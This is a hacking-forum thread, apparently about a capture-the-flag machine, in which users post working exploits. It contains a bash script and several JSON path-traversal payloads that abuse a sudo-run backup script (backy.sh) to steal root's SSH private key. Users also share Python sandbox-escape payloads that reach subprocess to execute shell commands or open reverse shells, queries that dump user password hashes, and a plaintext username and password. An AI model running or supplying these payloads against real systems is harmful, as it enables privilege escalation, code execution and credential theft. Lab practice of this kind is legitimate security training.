[jecurl]

For get user.txt and root.txt u can dump the .ssh private key off root. Because you can dump everything on root sur root privilege. Get .ssh private key of root are mandatory.

run

#!/bin/bash

# Config
TARGET="/var/../root/.ssh/" # Bypass to access /root/.ssh
DEST="/home/martin"
TASK_JSON="/tmp/task.json"
BACKUP_DIR="$DEST"
BACKY="/usr/bin/backy.sh"

echo "[*] Generating task.json to archive /root/.ssh"
cat <<EOF > $TASK_JSON
{
"destination": "$DEST",
"multiprocessing": true,
"verbose_log": true,
"directories_to_archive": [
"$TARGET"
]
}
EOF

echo "[*] Executing backy.sh with sudo..."
sudo $BACKY $TASK_JSON

# Wait a second to ensure archive is created
sleep 2

ARCHIVE=$(ls -t $BACKUP_DIR/code*.tar.bz2 2>/dev/null | head -n1)

if [ -z "$ARCHIVE" ]; then
echo "[!] No archive found in $BACKUP_DIR"
exit 1
fi

echo "[+] Archive found: $ARCHIVE"
mkdir -p /tmp/unpack_ssh
tar -xjf "$ARCHIVE" -C /tmp/unpack_ssh

echo "[+] Retrieved /root/.ssh content:"
ls -l /tmp/unpack_ssh/root/.ssh

# Optional: show the root private key (if available)
echo "[+] Root private key (if present):"
cat /tmp/unpack_ssh/root/.ssh/id_rsa 2>/dev/null || echo "[!] No private key found."

echo "[+] You can now try: ssh -i /tmp/unpack_ssh/root/.ssh/id_rsa root@localhost"

run You can now try: ssh -i /tmp/unpack_ssh/root/.ssh/id_rsa root@localhost" Bingo

[opt_123]

thanks very much

[machakilos]

can't extract the archive becauee of permission of root

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Reposting hidden content for free

[njro]

To get usernames: print([u.username for u in db.session.query(User).all()])

To get password hashes: print([u.password for u in db.session.query(User).all()])

---

Credentials

martin:nafeelswordsmaster

How do you come up with this? Any resources to learn from?

[void_228]

{ "directories_to_archive": [ "/home/../../root/" ], "destination": "/tmp/" }

The script checks for basic directory traversal once, so just add a second ../ and you can grab the entire root dir. Then just transfer it to local machine and extract.

Foothold was pretty difficult for me. Finding the right payload was hard, where do you all research this payload?

[akared666]

().__class__.__bases__[0].__subclasses__()[317](['SHELL CODE'], shell=True)

this works too for foothold. Anyone with any luck for root?

I made a similar payload, but I can't receive the reverse shell. How did you use this payload to get the user flag?

[blablablo]

Writeup user - root

Hidden Content

You must register or login to view this content.

[akared666]

().__class__.__bases__[0].__subclasses__()[317](['SHELL CODE'], shell=True)

this works too for foothold. Anyone with any luck for root?

I made a similar payload, but I can't receive the reverse shell. How did you use this payload to get the user flag?

okay,i got the payload that can display the result without reverse shell

print(().__class__.__bases__[0].__subclasses__()[317]("ls",shell=True,stdout=-1).communicate())

hope the playload can help u guys

[akared666]

To get usernames: print([u.username for u in db.session.query(User).all()])

To get password hashes: print([u.password for u in db.session.query(User).all()])

---

Credentials

martin:nafeelswordsmaster

How do you come up with this? Any resources to learn from?

you can use print(globals()) to see the whole avaliabled variables without shell

[peppermint0323]

For root:

{
    "destination": "/home/martin/backups/",
    "multiprocessing": true,
    "verbose_log": false,
    "directories_to_archive": [
        "/home/....//....//root"
    ]
}

then sudo /usr/bin/backy.sh <task.json>, then go to backups and unarchive.

Why is the tar packet I get with this payload empty?